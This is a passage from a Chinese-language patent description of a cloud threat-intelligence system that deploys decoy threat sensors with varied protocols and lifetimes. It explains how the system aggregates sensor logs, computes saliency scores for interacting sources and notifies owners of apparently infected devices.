威胁传感器部署和管理服务110可进一步包含威胁传感器部署计划执行器和威胁传感器部署器114,用于基于部署计划部署威胁传感器。在图1中,威胁传感器部署和管理服务110的威胁传感器部署计划执行器和威胁传感器部署器114已在多个地理区域中部署具有相关联威胁数据收集器的威胁传感器。例如,威胁传感器140a和140b已部署150在地理区域1 180中。威胁传感器140c和140d已部署150在地理区域n 182中。威胁传感器140a含有威胁数据收集器141和142。威胁传感器140b含有威胁数据收集器143和144。威胁传感器140c含有威胁数据收集器146和147。威胁传感器140d含有威胁数据收集器148和149。
[0120]
威胁传感器部署和管理服务110的威胁传感器部署计划执行器和威胁传感器部署器114还可在客户端网络中部署170威胁传感器。例如,威胁传感器160a已部署在客户端1的网络185中。威胁传感器160a含有威胁数据收集器162和164。
[0121]
威胁传感器部署和管理服务110可进一步包含威胁数据计划收集器和计划监测器
116,用于从已部署威胁传感器收集数据。在一些实施例中,此数据可以监测数据157的形式从分布式威胁传感器数据聚合和数据导出服务发送。在一些实施例中,威胁数据计划收集器和计划监测器116还可直接从威胁传感器收集此数据。威胁传感器部署和管理服务110可进一步包含威胁传感器部署计划调整器118,用于基于收集到的数据和威胁传感器寿命调整部署计划。在一些实施例中,威胁传感器部署计划执行器和威胁传感器部署器114可对部署计划执行调整。
[0122]
在一些实施例中,威胁情报系统100可包括分布式威胁传感器数据聚合和数据导出服务120。在一些实施例中,分布式威胁传感器数据收集和数据导出服务120可包含威胁传感器数据聚合器122,用于从所述多个威胁传感器接收传感器数据155,例如传感器日志流。威胁传感器数据聚合器122还可从部署在客户端网络中的威胁传感器160a接收传感器数据175,所述客户端网络例如客户端1的网络185。在一些实施例中,传感器日志流可具有关于与威胁传感器之间的交互的信息,包含交互来源的标识符。分布式威胁传感器数据聚合和数据导出服务120的威胁传感器数据聚合器122可根据来源聚合传感器日志中的信息。
[0123]
在一些实施例中,分布式威胁传感器数据收集和数据导出服务120还可包含显著性评分组件124,用于计算来源的显著性得分。例如,显著性得分量化了来源参与威胁网络通信的可能性。在一些实施例中,分布式威胁传感器数据聚合和数据导出服务120还可包含威胁传感器数据和显著性得分导出器126,用于将显著性得分提供到其它目标。例如,威胁传感器数据和显著性得分导出器126可将显著性得分和/或接收到的或修改后的传感器日志流导出到以下一个或多个:数据存储区、可用于更深入的类型分析的数据库、分布式威胁传感器分析和相关服务和/或用户界面或仪表板。
[0124]
在一些实施例中,威胁情报系统100还可包括分布式威胁传感器分析和相关服务130。在一些实施例中,分布式威胁传感器分析和相关服务130获得与所述多个威胁传感器交互的不同来源的显著性得分。在一些实施例中,分布式威胁传感器分析和相关服务130可包含恶意参与者确定组件132,用于基于显著性得分来确定哪些来源是恶意参与者。在一些实施例中,服务还可包含已知参与者相关组件134,用于接收已知参与者的标识符,例如提供商网络中的服务器、提供商网络中的计算实例、客户端网络中的客户端装置或远程网络中部署的iot装置。在这些实施例中的一些实施例中,分布式威胁传感器分析和相关服务130的已知参与者相关组件134可使恶意参与者与已知参与者相关,以识别哪些已知参与者可能受到恶意软件感染。
[0125]
分布式威胁传感器分析和相关服务130还可包含通知模块136。在一些实施例中,通知模块136可将被恶意软件感染的一个或多个已知装置的指示提供给目标。在一些实施例中,它还可触发执行客户提供的功能。在一些实施例中,它还可向远程网络发送消息,指示受感染的已知装置。另外或替代地,在一些实施例中,通知模块136可终止受感染的已知装置的证书,例如安全证书。
[0126]
图2示出根据一些实施例的威胁传感器部署和管理组件202的实例系统的其它方面,其中威胁传感器部署和管理组件202部署并配置多个威胁传感器204
……
214,威胁传感器含有多个不同威胁数据收集器206、208、210、212、216、218、220,其中威胁数据收集器从多个潜在恶意参与者222、224、226接收入站通信。
[0127]
威胁传感器部署和管理组件202可以将部署和/或配置从单个威胁传感器扩展到
多个威胁传感器。威胁传感器部署和管理组件202可以管理威胁传感器204
……
214以及与威胁传感器相关联的每个威胁数据收集器的配置和部署,例如与威胁传感器1 204相关联的威胁数据收集器206、208、210和212,以及与威胁传感器n相关联的威胁数据收集器216、218和220。在一些实施例中,威胁传感器部署和管理组件202可以在大量区域中部署威胁传感器,并且每个区域中可存在大量威胁传感器。在一些实施例中,威胁传感器部署和管理组件202还可以管理威胁传感器204
……
214。在一些实施例中,它可以确定威胁数据收集器206、208、210、212、216、218、220的类型、每个威胁数据收集器实施的交互类型、功能和配置方式。
[0128]
例如,威胁传感器部署和管理组件202可以确定威胁数据收集器206、208、210、212、216、218、220是中等交互还是低交互。在一些实施例中,威胁传感器部署和管理组件202还可以确定组成每个威胁传感器204
……
214的威胁数据收集器206、208、210、212、216、218、220的数目和类型。在一些实施例中,威胁传感器部署和管理组件202可以确定威胁传感器运行的时间范围,以及威胁传感器的启动、重新启动和分布。例如,威胁传感器1 204的寿命为2小时,而威胁传感器n 214的寿命为1天。
[0129]
在一些实施例中,威胁传感器部署和管理组件202可通过确定部署计划来执行这些管理功能。在一些实施例中,威胁传感器部署和管理组件202可确定多个威胁传感器的部署计划,其中各个威胁传感器指定多个不同类型的威胁数据收集器中的一个或多个威胁数据收集器。
[0130]
在一些实施例中,不同类型的威胁数据收集器中的至少一些可使用不同的通信协议或通信端口,或者提供不同的针对入站通信的响应。例如,威胁传感器1 204的威胁数据收集器206基于ftp协议操作,可在端口20和21上操作,并且可以不同的标头响应入站通信。作为另一实例,威胁传感器1 204的威胁数据收集器208基于ssh协议操作,可在端口22和23上操作,并且可以unix标头响应入站通信。作为另一实例,威胁传感器1 204的威胁数据收集器210基于telnet协议操作,可在端口23上操作,并且可以不同的标头响应入站通信。作为另一实例,威胁传感器1 204的威胁数据收集器212基于http协议操作,可在端口80、443或8008上操作,并且可以一组网页响应入站通信。作为另一实例,威胁传感器n 214的威胁数据收集器216基于ftp协议操作,可在端口21上操作,并且可以macos标头响应入站通信。作为另一实例,威胁传感器n214的威胁数据收集器218基于ssh协议操作,可在端口22上操作,并且可以不同的标头响应入站通信。作为最终实例,威胁传感器n 214的威胁数据收集器220基于gopher协议操作,可在端口30上操作,并且可以unix标头响应入站通信。
[0131]
在一些实施例中,威胁传感器部署和管理组件202的部署计划还可为威胁传感器指定不同寿命。例如,威胁传感器1 204的寿命为2小时,而威胁传感器n 214的寿命为1天。在一些实施例中,威胁传感器部署和管理组件可在多个不同地理区域中的多个不同网络地址处部署所述多个威胁传感器,并根据部署计划进行配置。例如,威胁传感器1部署在ip地址“xxx.xxx.54.173”处,威胁传感器n部署在ip地址“xxx.xxx.143.21”处。
[0132]
然后,威胁数据收集器可接收入站通信,并记录与交互来源的交互。在一些实施例中,这些交互来源可以是潜在的恶意参与者,例如ip地址“yyy.yyy.yyy.yyy”处的潜在恶意参与者222、ip地址“zzz.zzz.zzz.zzz”处的潜在恶意参与者224以及ip地址“vvv.vvv.vvv.vvv”处的潜在恶意参与者226。在一些实施例中,威胁传感器部署和管理组
件202可从已部署威胁传感器204、214收集威胁数据,并且基于收集到的威胁数据和威胁传感器的不同寿命,确定调整后的部署计划,包括对部署计划的一个或多个调整。在一些实施例中,威胁传感器部署和管理组件可根据调整后的部署计划,在一个或多个地理区域中执行对威胁传感器的调整。
[0133]
图3示出分布式威胁传感器数据聚合和数据导出组件302的实例系统的其它方面,其从数据流服务320接收传感器日志314、316、318的流,所述数据流服务从多个威胁传感器324、326、328、330和332接收数据,例如传感器日志322。分布式威胁传感器数据聚合和数据导出组件302包含传感器日志聚合组件306,用于将传感器日志聚合到当天或对应日期的威胁传感器攻击表格304中。根据一些实施例,分布式威胁传感器数据聚合和数据导出组件302还可包含显著性得分确定器308,用于计算与威胁传感器交互的各个来源的显著性得分310。
[0134]
在一些实施例中,威胁传感器324、326、328、330和332收集的可疑对象交互数据可以通过处理管线移动,以增强、聚合、整理和产生可操作的威胁情报输出,作为制定安全决策的因素子集使用。来自威胁传感器324、326、328、330和332的威胁数据收集器的交互可以以某一形式的传感器日志322收集,并传递到中央数据流服务320,所述服务可形成传感器日志流。在图3中,传感器日志流由传感器日志m 314、传感器日志m+1 316和传感器日志m+2 316组成。传感器日志314来自ip地址为“xxx.xxx.143.21”的威胁传感器n。传感器日志314含有关于在端口21上使用ftp协议与来源ip“zzz.zzz.zzz.zzz”交互的信息。它还含有关于交互时间的信息和关于接收到的交互有效负载的信息。传感器日志316来自ip地址为“xxx.xxx.54.173”的威胁传感器1。传感器日志316含有关于在端口23上使用ssh协议与来源ip“yyy.yyy.yyy.yyy”交互的信息。它还含有关于交互时间的信息和关于接收到的交互有效负载的信息。传感器日志318也来自ip地址为“xxx.xxx.54.173”的威胁传感器1。传感器日志318含有关于在端口21上使用ftp协议与来源ip“yyy.yyy.yyy.yyy”交互的信息。它还含有关于交互时间的信息和关于接收到的交互有效负载的信息。
[0135]
在一些实施例中,分布式威胁传感器数据聚合和数据导出组件302的传感器日志聚合组件306可以将所有数据聚合成一种格式,以便更容易处理。传感器日志聚合组件306可将数据聚合到当天或对应日期的威胁传感器攻击表格304中。例如,表格可包含交互来源的ip地址、最后一次交互的时间、被来自所述来源的交互命中的威胁传感器的数目、被来自所述来源的交互命中的端口的数目、供来自所述来源的交互使用的各种协议,以及通过所述来源下载到威胁数据收集器的不同有效负载。
[0136]
根据一些实施例,分布式威胁传感器数据聚合和数据导出组件302可包含显著性得分确定器308,用于计算与威胁传感器交互的各个来源的显著性得分310。显著性得分确定器308可使用聚合的当天或对应日期的威胁传感器攻击表格304以及来自威胁传感器攻击数据库的当前和先前数天的历史数据312来计算显著性得分。在图3所示的实例中,显著性得分确定器308计算出了ip地址“yyy.yyy.yyy.yyy”的显著性得分为52,ip地址“zzz.zzz.zzz.zzz”的显著性得分为87,ip地址“vvv.vvv.vvv.vvv”的显著性得分为27。
[0137]
在一些实施例中,ip地址等许多威胁指标可能太不稳定,无法独立于其它形式的安全分析进行安全警报。因此,在一些实施例中,威胁情报系统100和/或分布式威胁传感器数据聚合和数据导出组件202可以定期导出ip声誉数据,作为其威胁指标输出之一。这可由
通知模块312完成。在一些实施例中,分布式威胁传感器数据聚合和数据导出组件可以定期,例如每10分钟,导出其ip地址声誉知识的更新版本。在一些实施例中,这些导出可含有关于每个可疑ip地址交互的元数据,例如交互的传感器、协议、端口、方向、url和观察天数。例如,通知模块312可以将显著性得分和/或接收到的或修改后的传感器日志流导出到以下一个或多个:数据存储区、可用于更深入的类型分析的数据库、分布式威胁传感器分析和相关服务和/或用户界面或仪表板。
[0138]
图4示出分布式威胁传感器分析和相关组件402的实例系统的其它方面,其从显著性得分确定器408接收和/或通过显著性得分确定器408计算与交互来源相关联的显著性得分。根据一些实施例,分布式威胁传感器分析和相关组件402还包含用于确定恶意参与者的恶意参与者确定器420、存储恶意参与者的标识的恶意参与者存储装置430、使恶意参与者与网络中的已知装置相关以确定受感染的已知装置的已知装置感染相关器440,以及之后提供关于受感染的已知装置的某一种通知的通知模块450。
[0139]
在一些实施例中,分布式威胁传感器分析和相关组件402可确定交互来自提供商网络拥有所有权或控制权的一个或多个已知实例。这些已知实例可以是提供商网络463中的装置、客户端网络464、466中的装置或已知的iot装置468。在一些实施例中,可以使用一种机制来阻止这些类型的已知或受控实例、服务器或装置的滥用。很多时候,提供商网络的客户端本身可能是恶意参与者的受害者,例如,恶意参与者接管了它们的帐户,或接管了它们的实例,并开始向其它目标传播感染所述实例、服务器或装置的恶意软件。因此,提供商网络的这些受到威胁的实例、服务器或装置可能最终也会命中威胁情报系统的威胁传感器和威胁数据收集器。
[0140]
在一些实施例中,当提供商网络的客户端本身是恶意参与者的受害者时,提供商网络可以通知客户端其实例、服务器或装置受到威胁。这可由通知模块450完成。在一些实施例中,通知模块可与客户提供功能执行服务490、云报告服务492、消息传递服务494或iot控制台服务496通信。在一些实施例中,这些可以是提供商网络的服务。
[0141]
图5示出根据一些实施例的威胁情报系统的一部分的实例系统环境,其中多个威胁传感器将传感器日志提供到传感器日志获取/分析服务,所述传感器日志获取/分析服务将威胁情报表格提供到威胁情报导出服务,所述威胁情报导出服务将数据提供到威胁情报相关服务,其中实例系统包含多个其它组件和服务。
[0142]
图5公开根据一些实施例的跨多个区域分布的多个计算实例556,其中一个或多个实例可以与威胁传感器(“t.s.”)相关联。每个威胁传感器可被指派不同的ip地址。威胁传感器可以是不同类型,并且还可包含不同类型的威胁数据收集器。威胁传感器还可具有不同寿命。威胁传感器可具有先前论述的威胁传感器和威胁数据收集器的一些或所有属性和特征。然后,可以在传感器日志群组548中收集来自一些或所有威胁传感器的交互的日志,这些日志可接着在传感器日志流548中流式传输。传感器日志流538可以流式传输到传感器日志获取/分析服务540。在一些实施例中,传感器日志获取/分析服务540可以是分布式威胁传感器数据聚合和数据导出组件的一部分。
[0143]
传感器日志获取/分析服务540可以在流中执行传感器日志的初始分析和注入。传感器日志获取/分析服务540可以聚合数据,以便在威胁情报表格536中输出,还可以将原始传感器日志输出到单独的传感器日志数据存储区544和传感器日志数据库546。传感器日志
获取/分析服务540可以使用自己的传感器日志流542将此数据输出到数据存储区和数据库。在一些实施例中,传感器日志数据存储区544和传感器日志数据库546中的数据可用于手动分析数据。例如,可以运行数据库查询,以查看传感器日志中有哪些有趣的信息。例如,威胁分析师可以对此数据运行自定义查询。
[0144]
传感器日志获取/分析服务540还可以考虑外部信息的来源。传感器日志获取/分析服务540可以考虑ip地址的地理位置映射和/或ip地址的isp映射,以便从正在处理的传感器日志流538中为来源ip地址提供更多上下文。ip地址的地理位置映射和ip地址的isp映射最初可以从输入到地理/isp导入服务518的地理/isp导入事件流504接收,其中信息存储在地理/isp数据存储区534中,最终可由传感器日志获取/分析服务540使用。传感器日志获取/分析服务540还可以考虑外部威胁情报,以便将从威胁传感器接收到的威胁情报与外部威胁情报源进行比较。外部威胁情报最初可以从输入到外部威胁情报导入服务516中的外部威胁情报导入事件流502接收,其中信息存储在外部威胁情报导入数据存储区532中,最终可由传感器日志获取/分析服务540使用。外部信息的来源可用于威胁情报表格536条目中的额外信息,以及可以与传感器日志数据存储区544或数据库546中的原始传感器日志一起存储。
[0145]
在一些实施例中,威胁情报表格536可以聚合特定时间周期内关于每个ip地址的信息。在一些实施例中,此特定时间周期可以是一天。例如,对于每个来源ip地址,可以每天在威胁情报表格536中进行记录。例如,所述记录可以包含在所述时间周期(例如一天)期间,目标端口是什么、来自来源的有效负载被分类为什么有效负载类别、来源与什么服务交互、来源与什么威胁传感器交互、来源使用了什么协议,以及来源是参与了入站交互、还是参与了出站交互还是同时参与了入站和出站交互两者。在一些实施例中,威胁情报表格536可以为每个记录提供数个时间周期的存留时间(例如,30天)。例如,可以有一个滚动窗口可用,例如30天的滚动窗口。在一些实施例中,此滚动窗口可用于与至少一个威胁传感器交互的每个来源地址(例如ip地址)。因此,在一些实施例中,如果来源地址在滚动窗口的时间周期(例如30天)期间不活动,那么可能会从威胁情报表格536中删除关于所述来源地址的信息。
[0146]
在一些实施例中,由于威胁情报表格536中的聚合数据,可以快速查找和导出有关来源地址的数据,而无需查看传感器日志。在这些实施例中的一些实施例中,数据也可以非常频繁地导出。此数据导出可由威胁情报导出服务220完成。在一些实施例中,威胁情报导出服务器220可以每10分钟导出一次威胁情报表格536中所有ip地址的所有信息。在一些实施例中,每天可能有600,000到100万个ip地址,这些地址每10分钟导出一次。每个ip地址都有一个非常新的导出威胁情报。使用原始交互日志或任何其它类型的系统执行此过程都会非常昂贵。
[0147]
威胁情报导出服务520可以是分布式威胁传感器数据聚合和数据导出组件的一部分,它可以基于接收到的威胁情报导出事件506导出。威胁情报导出服务220可以将威胁情报表格536中的ip地址的信息导出到威胁情报导出事件数据存储区506,然后所述存储区可以将数据存储在威胁情报数据库510中,和/或它可以导出到威胁情报指标522,所述指标可以显示在仪表板554上。仪表板554可以从传感器日志获取/分析指标552、威胁情报指标522、威胁情报导出事件数据存储区508和/或威胁情报相关指标556获取信息,并向系统的
客户端或管理员提供仪表板表示。
[0148]
威胁情报相关服务524可以是分布式威胁传感器分析和相关组件的一部分,它使用由威胁情报导出服务520输出的来自威胁情报导出事件数据存储区508的数据,使来自威胁情报导出事件数据存储区508的威胁情报与来自外部装置的日志交叉相关。这些来自外部装置的日志可以是已知装置的日志,例如提供商网络中的服务器、提供商网络中的计算实例、客户端网络中的客户端装置或远程网络中部署的iot装置。威胁情报相关服务524可以确定外部和/或已知装置受到威胁,以便采取措施,例如将受到威胁的装置隔离。
[0149]
来自外部装置的日志可由外部装置事件通知服务514接收,所述服务将通知馈送到外部装置事件队列512。威胁情报相关服务524可以将交叉相关数据输出到威胁情报相关流526,所述流可以将数据流式传输到威胁情报相关数据存储区528,然后所述存储区可以将数据存储在威胁情报相关数据库530中。威胁情报相关服务524还可以将交叉相关数据输出到威胁情报相关日志群组538,所述日志群组可以将威胁情报相关指标556发送到仪表板554。
[0150]
提供商网络中的威胁情报系统
[0151]
图6示出根据一些实施例的威胁情报系统600的实例提供商网络环境,其中威胁情报系统由事件驱动计算服务610b、对象存储服务610e、数据库服务610c和数据流服务610d的部分实施,并且其中已部署威胁传感器和潜在恶意参与者由提供商网络602的计算实例服务610a实施。但是,这些实例提供商网络环境并不意图为限制性的。
[0152]
图6示出根据至少一些实施例的实例提供商网络环境602中的威胁情报系统600。服务提供商网络600可经由一个或多个计算服务610a或事件驱动计算服务610b向客户端660提供计算资源620、630、650。服务提供商网络602可由实体操作,以向客户端660提供可经由互联网和/或其它网络690访问的一个或多个服务,例如各种类型的基于云的计算或存储服务。在一些实施例中,服务提供商网络602可实施网络服务器,例如代管电子商务网站。服务提供商网络602可包含许多代管各种资源池的数据中心,例如物理和/或虚拟化计算机服务器、存储装置、联网设备等等的集合,这些资源池是实施和分发服务提供商网络602提供的基础设施和服务所需的。在一些实施例中,服务提供商网络可以为其提供的服务使用计算资源620、630、650。在一些实施例中,这些计算资源620、630、650可以以称为“实例”的单元(例如虚拟计算实例)提供给客户端660。
[0153]
提供商网络602可以经由一个或多个虚拟化服务向客户端提供资源虚拟化,所述服务允许客户端访问、购买、租用或以其它方式获取虚拟化资源的实例,包含但不限于计算和存储资源,这些资源在一个或多个数据中心中的一个或多个提供商网络内的装置上实施。在一些实施例中,私有ip地址可以与资源实例相关联;私有ip地址是提供商网络602上资源实例的内部网络地址。在一些实施例中,提供商网络602还可以提供客户端可以从提供商602获得的公共ip地址和/或公共ip地址范围(例如,第四版互联网协议(ipv4)或第六版互联网协议(ipv6)地址)。
[0154]
通常,提供商网络602经由虚拟化服务,可以允许服务提供商的客户端(例如,操作客户端660的客户端)将指派或分配给客户端的至少一些公共ip地址与指派给所述客户端的特定资源实例动态关联。提供商网络602还可允许客户端将先前映射到分配给所述客户端的一个虚拟化计算资源实例的公共ip地址重新映射到同样分配给所述客户端的另一虚
拟化计算资源实例。例如,使用服务提供商提供的虚拟化计算资源实例和公共ip地址,服务提供商的客户端,例如客户端660的运营商,可以实施客户端特定的应用程序,并在例如互联网的中间网络690上呈现客户端的应用程序。然后,客户端660或中间网络690上的其它网络实体可以生成到客户端660发布的目标域名的流量。首先,客户端660或其它网络实体都可以通过负载均衡器请求连接到多个计算实例620、630、650中的一个计算实例。
[0155]
负载均衡器可以使用可能包含其自身公共ip地址的标识信息进行响应。然后,客户端660或中间网络690上的其它网络实体可以生成到路由器服务接收到的公共ip地址的流量。流量被路由到服务提供商数据中心,在数据中心经由网络基板路由到当前映射到目标公共ip地址的网络连接管理器的私有ip地址。类似地,来自网络连接管理器的响应流量可以经由网络基板路由回中间网络640,然后到达来源实体。
[0156]
此处使用的私有ip地址是指提供商网络中资源实例的内部网络地址。私有ip地址只能在提供商网络内路由。源于提供商网络之外的网络流量不会直接路由到私有ip地址;相反,流量使用的是映射到所述资源实例的公共ip地址。提供商网络可包含提供网络地址转换(nat)或类似功能的网络装置或设备,以执行从公共ip地址到私有ip地址的映射以及从私有ip地址到公共ip地址的映射。
[0157]
此处使用的公共ip地址是互联网可路由网络地址,由服务提供商或客户端指派给资源实例。路由到公共ip地址的流量被转换,例如经由1:1网络地址转换(nat),并转发到资源实例的相应私有ip地址。一些公共ip地址可由提供商网络基础设施指派给特定的资源实例;这些公共ip地址可以称为标准公共ip地址,或者简称为标准ip地址。在至少一些实施例中,标准ip地址到资源实例的私有ip地址的映射是所有资源实例类型的默认启动配置。
[0158]
至少一些公共ip地址可以分配给提供商网络602的客户端或由其获取;然后,客户端可以将其分配的公共ip地址指派给分配到所述客户端的特定资源实例。这些公共ip地址可以称为客户端公共ip地址,或者简称为客户端ip地址。客户端ip地址可以由客户端指派给资源实例,例如经由服务提供商提供的api来指派,而不是像标准ip地址那样由提供商网络602指派给资源实例。与标准ip地址不同,客户端ip地址被分配给客户端帐户,并且可以根据需要或需求由相应的客户端重新映射到其它资源实例。客户端ip地址与客户端的帐户关联,而不是与特定的资源实例相关联,客户端控制所述ip地址,直到客户端选择释放它。客户端ip地址可以是弹性ip地址。与传统的静态ip地址不同,客户端ip地址允许客户端通过将客户端的公共ip地址重新映射到与客户端帐户相关联的任何资源实例来掩盖资源实例或可用性区域故障。例如,客户端ip地址使客户端能够通过将客户端ip地址重新映射到替换资源实例来解决客户端资源实例或软件的问题。
[0159]
提供商网络602可以向客户端660提供由物理服务器节点实施的计算服务610a或事件驱动计算服务610b,所述服务包含多个计算实例620和630。计算服务还含有许多其它服务器实例650,用于提供商网络602的许多其它客户端和其他客户。作为另一实例,提供商网络提供由物理数据存储节点实施的虚拟化数据存储服务或对象存储服务6103,所述服务可包含多个数据存储实例。数据存储服务或对象存储服务610e可以存储客户端的文件,客户端的相应服务器实例通过文件访问649访问这些文件。作为另一实例,提供商网络可以提供由数据库节点实施的虚拟化数据库服务610c,所述服务包含客户端的至少一个数据库实例。计算服务中属于客户端的服务器实例可以在需要时通过数据库访问648访问属于客户
端的数据库实例。数据库服务可含有一个数据库实例,其中包含当前和先前数天的威胁传感器攻击数据库670。数据库服务和数据存储服务还含有属于提供商网络602的其它客户端和其他客户的多个文件或数据库实例。提供商网络还可包含属于一个或多个客户的多个其它客户端服务。例如,提供商网络602可包含向客户提供的数据流服务610d。此数据流服务610d可包含传感器日志数据流680,其从威胁传感器640接收传感器数据645,并将传感器数据流647递送到威胁情报系统600的服务器实例620。例如,客户端660可以经由接口,如服务的一个或多个api,访问任何一个客户端服务610a、610b、610c、610d或610e,获取在提供商网络602的生产网络部分中的服务的多个节点上实施的资源(例如,数据存储实例、文件、数据库实例或服务器实例)的使用情况。
[0160]
在图6所示的实施例中,事件驱动计算服务620a的多个服务器实例620中的一些或全部用于实施威胁情报系统600的各种主机,例如威胁传感器部署和管理组件、分布式威胁传感器数据聚合和数据导出组件或分布式威胁传感器分析和相关组件。另外,数据库服务690c中的数据库实例用于代管当前和先前数天的威胁传感器攻击数据库670,作为数据库实例的表格。如前所述,用于实施威胁情报系统600的各种主机的多个服务器实例620可以通过数据库访问648访问数据库服务610c中的表格670。在这些实施例中,所述多个服务器实例620充当威胁情报系统600的主机,并使用计算服务610a部署622多个服务器实例630作为威胁传感器640。例如,一个客户端660拥有的计算服务610a的不同多个服务器实例650可能已感染恶意软件,它们因此变为恶意参与者651。这些恶意参与者651可以与威胁传感器640发起恶意交互655。威胁传感器640可以检测和收集关于恶意交互655的信息,并产生传感器数据645,这些数据可以发送到数据流服务610d的传感器日志数据流680。传感器日志数据流680是威胁情报系统600的一部分。传感器日志数据流680可以将传感器数据647流式传输到事件驱动计算服务610b的一个或多个事件驱动计算实例620。
[0161]
威胁情报系统的说明性方法
[0162]
图7是根据一些实施例的可由威胁传感器部署和管理组件实施的说明性方法的流程图,其中威胁传感器部署和管理组件确定部署计划,部署多个威胁传感器,从已部署威胁传感器收集威胁数据,确定调整后的部署计划,并执行部署计划的调整。
[0163]
图7开始于框710:威胁传感器部署和管理组件确定所述多个威胁传感器的部署计划,其中各个威胁传感器包括多个不同类型的威胁数据收集器中的一个或多个威胁数据收集器,其中所述不同类型的威胁数据收集器中的至少一些使用不同的通信协议或通信端口,或者提供不同的针对入站通信的响应,并且其中部署计划为威胁传感器指定不同寿命。流程图转到框720,其中威胁传感器部署和管理组件在多个不同地理区域的不同网络地址处部署所述多个威胁传感器,并根据部署计划配置它们。流程图继续进行到框730:从已部署威胁传感器收集威胁数据。在框740处,威胁传感器部署和管理组件基于收集到的数据确定调整后的部署计划,包括对部署计划的一个或多个调整。然后,流程图转到框750:在一个或多个地理区域中,执行威胁传感器的部署计划的调整。在一些实施例中,流程图可接着迭代地执行步骤730、740和750以收集额外数据,确定部署计划的额外调整,并执行调整后的部署计划。
[0164]
图8是根据一些实施例的可由威胁传感器和所述威胁传感器的选定威胁数据收集器实施的说明性方法的流程图。图8开始于通过威胁传感器在特定端口处接收入站通信,并
确定入站通信的来源ip地址。流程图转到框820:确定是否已经从来源接收到阈值数目的入站通信。如果已经从来源接收到阈值数目的入站通信,那么流程图只是返回810,因为威胁传感器不想不成比例地仅使用单个来源的数据来歪曲其收集的数据。如果尚未从来源接收到阈值数目的入站通信,那么流程图转到框830:确定是否可以根据入站通信确定协议。如果可以根据入站通信确定协议,那么流程图转到834:为协议选择适当的威胁数据收集器以响应入站通信。如果在框830中无法根据入站通信确定协议,那么流程图转到框832:通过在适当的威胁数据收集器中使用基于权重的随机选择来选择威胁数据收集器进行响应。
[0165]
无论在框830中采用哪一个分支,流程图最终都会转到框840:由威胁数据收集器选择用于响应入站通信的横幅,并使用所述横幅响应入站通信。流程图转到框850:由威胁数据收集器确定从入站通信中捕获多少数据,并从入站通信中捕获适当数量的数据。然后流程图转到框860:判定威胁数据收集器是否应执行出站通信。如果威胁数据收集器应执行出站通信,那么它要在框865中确定入站通信中存在的网络地址,并发起到所述网络地址的出站通信以确定对威胁情报有用的额外信息。但是,如果威胁数据收集器不应执行出站通信,以及在执行框865之后,流程图前进到870:生成日志条目,所述日志条目包含入站通信的来源ip地址以及以下一个或多个:目标端口、有效负载分类、使用的协议、涉及的威胁传感器以及交互是否包含出站发起的连接。然后,在框875中,此日志条目被传输到中央日志条目流。最后,流程图在框880中确定威胁传感器的寿命是否到期。如果寿命到期,那么流程图在框890中终止威胁传感器。如果寿命尚未到期,那么流程图返回框810,其中威胁传感器再次在特定端口处接收入站通信,并确定入站通信的来源ip地址。
[0166]
图9是根据一些实施例的可由分布式威胁传感器数据聚合和数据导出组件实施的说明性方法的流程图,其中分布式威胁传感器数据聚合和数据导出组件接收具有关于与威胁传感器之间的交互的信息的传感器日志流,按照交互来源聚合传感器日志中的信息,计算来源的显著性得分,并将显著性得分提供到其它目标,其中显著性得分包含来源参与威胁网络通信的可能性。
[0167]
流程图开始于框910,其中分布式威胁传感器数据聚合和数据导出组件从多个威胁传感器接收传感器日志流,其中各个日志包含关于与威胁传感器之间的交互的信息,并且其中所述信息包含交互来源的标识符。流程图转到框920,其中分布式威胁传感器数据聚合和数据导出组件按照交互来源的标识符,从在限定时间周期内自所述多个威胁传感器接收到的传感器日志流中将关于与威胁传感器之间的交互的信息聚合成交互的各个来源在限定时间周期内的关于交互的聚合信息。然后流程图转到930,其中分布式威胁传感器数据聚合和数据导出组件至少部分地基于关于交互的聚合信息,计算交互的各个来源的显著性得分,其中各个显著性得分包括一个来源参与威胁网络通信的概率。最后,流程图转到940,其中分布式威胁传感器数据聚合和数据导出组件将交互的至少一些来源的至少一些显著性得分提供到一个或多个目标。
[0168]
图10是根据一些实施例的可由分布式威胁传感器数据聚合和数据导出组件实施的说明性方法的更详细流程图,其中分布式威胁传感器数据聚合和数据导出组件接收具有关于与威胁传感器之间的交互的信息的传感器日志流,可访问其它信息以修改传感器日志,按照交互来源聚合传感器日志中的信息,访问历史数据,计算来源的显著性得分,并将显著性得分和/或传感器日志导出到一个或多个目标,其中显著性得分包含来源参与威胁
网络通信的可能性。
[0169]
流程图开始于框1010:从多个威胁传感器接收传感器日志流,其中传感器日志流中的各个日志包括交互的来源ip地址以及关于交互的其它信息。然后,在框1020中,确定是否可以访问将地理位置和/或外部isp映射到来源标识符的信息。如果可以访问此类信息,那么流程图转到框1025:基于使地理位置和/或外部isp与交互来源的标识符相关联的信息修改一些传感器日志。如果无法访问此类信息,以及在执行步骤1025之后,流程图转到框1030:判定是否可以访问外部威胁情报。如果可以访问外部威胁情报,那么执行框1035:基于接收到的外部威胁情报修改一些传感器日志。如果无法访问此类信息,以及在执行步骤1035之后,流程图转到框1040,其中例如分布式威胁传感器数据聚合和数据导出组件将当前时间周期内的关于交互的其它信息聚合到按照交互来源的标识符组织而成的关于交互的聚合信息中。然后,在框1050中访问先前按照先前交互的来源的标识符聚合的先前时间周期内的关于交互的历史数据。接着在框1060中,基于最新聚合的信息和历史数据,计算交互来源的显著性得分,其中显著性得分包含来源参与威胁网络通信的概率。最后,流程图转到框1070:将显著性得分和/或接收到的或修改后的传感器日志流导出到以下一个或多个:数据存储区、可用于更深入的类型分析的数据库、分布式威胁传感器分析和相关服务和/或用户界面或仪表板。
[0170]
图11是根据一些实施例的可由分布式威胁传感器数据聚合和数据导出组件或分布式威胁传感器分析和相关组件实施以计算与一个或多个威胁传感器交互的来源的显著性得分的说明性方法的流程图。为了计算显著性得分,流程图开始于框110:从交互来源接收关于去往威胁传感器的交互的当前时间周期内的聚合信息,并接收关于来自来源的交互的先前时间周期内的聚合信息。
[0171]
然后,流程图将时间周期设置成当前时间周期及显著性得分=0,开始包括1120、1130、1140、1150和1155的循环。流程图转到框1130:基于来源与威胁传感器之间的交互的新近度以及其中出现来源的日志所属的不同威胁传感器的数目,确定此时间周期的显著性得分。流程图在框1140中通过将此时间周期的显著性得分添加到显著性得分的运行总数中来计算新的显著性得分。如果1150中还有其它时间周期,那么流程图在1155中将循环中使用的时间周期设置为前一时间周期,并在1120中再次开始循环。因此,流程图计算多个不同时间周期的多个时间周期显著性得分,并将每个显著性得分添加到累积总计中。最终显著性得分总计是所有相关时间周期的所有时间周期显著性得分的总和。
[0172]
